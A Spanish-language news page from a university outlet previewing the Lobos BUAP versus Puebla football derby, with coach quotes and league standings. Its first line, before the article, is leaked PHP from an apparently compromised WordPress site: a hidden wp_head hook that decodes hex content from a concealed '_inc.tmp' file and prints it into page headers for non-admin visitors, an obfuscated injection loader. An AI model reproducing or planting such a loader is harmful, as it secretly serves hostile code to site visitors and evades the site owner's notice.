if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Lobos y Puebla por el derbi poblano – La Opinión Universitaria La Opinión Universitaria
Menu

Lobos y Puebla por el derbi poblano

 

  • Se enfrentan el domingo a las 16:00 horas en el estadio Universitario BUAP

 

Lobos y Puebla se ven las caras una vez más en el derbi poblano, que en su cuarta edición en la Liga MX, tendrá verificativo el domingo a las 16:00 horas en la cancha del estadio Universitario BUAP.

El cuadro licántropo viene de empatar de visita ante Morelia, y en su más reciente presentación como local, perdió 1-0 ante León. En casa tienen tres partidos ganados, un empate y dos derrotas.

Suman 14 puntos y se ubican en el lugar 13 de la clasificación, a solo tres puntos del octavo sitio.

“Vamos a jugar con el estilo de juego que nos ha caracterizado toda la temporada, una buena posesión de la pelota, terminar muchas jugadas, tratar de recuperar la pelota rápidamente cuando no la tengamos; no vamos a cambiar el estilo de juego que es el que nos ha dado la permanencia y es lo que nos ha dado estar peleando por un par de lugares para la calificación”, dijo el director técnico Francisco Palencia.

Por su parte el Puebla, desde la llegada de José Luis Sánchez Solá ha tenido un notable repunte, ha ganado 9 de los 15 puntos disputados (dos triunfos, dos empates y una derrota), con solo un gol permitido; el conjunto camotero es noveno en la clasificación con 16 puntos y un triunfo sobre Lobos los metería en zona de calificación.

“Este partido es vital porque es prácticamente un rival directo de los que estamos peleando para conseguir ese sitio en la liguilla y creo que va a ser un lindo partido porque es joven el derbi poblano; nosotros evidentemente queremos que los tres puntos se queden aquí en casa y empezar a forjar ese derbi, que yo creo que le viene muy bien a la ciudad porque ya la gente con dos equipos de primera división asegurando todavía un año más en primera división, pues creo que se puede ir formando un derbi bonito aquí en Puebla”.

Palencia agregó que ve un encuentro cerrado por la cercanía entre los

conjuntos en la tabla, pero lobeznos cuentan con las virtudes necesarias para

obtener el resultado.

“El equipo es muy ambicioso y quiere seguir sumando más puntos, pero yo creo que el Puebla y Lobos BUAP llegan muy parejos, es un derbi que va a ser muy parejo en el sentido de las aspiraciones de los dos, nosotros aspiramos, naturalmente, a vencer al rival de la ciudad, pero lo más importante son los tres puntos porque te colocan en zona de calificación y para nosotros es importantísimo llegar a calificar”.

Finalmente, recalcó que el objetivo de la temporada ha cambiado tras lograr la

permanencia, pero que el Club Puebla no es el único que representa un reto para llegar a liguilla.

“Somos seis equipos por dos lugares, por el séptimo y por el octavo de la liguilla, ahora somos seis equipos allí compitiendo, obviamente nos interesa muchísimo porque el equipo es un equipo ambicioso, es un equipo que quiere siempre más, que tiene muchas ganas y está muy motivado por seguir teniendo logros; ahora el que viene también es muy importante para nosotros, de poder poner a Lobos en calificación por primera vez en su historia en Primera División”.

 

 

  • No comments

    Deja una respuesta

    Tweets recientes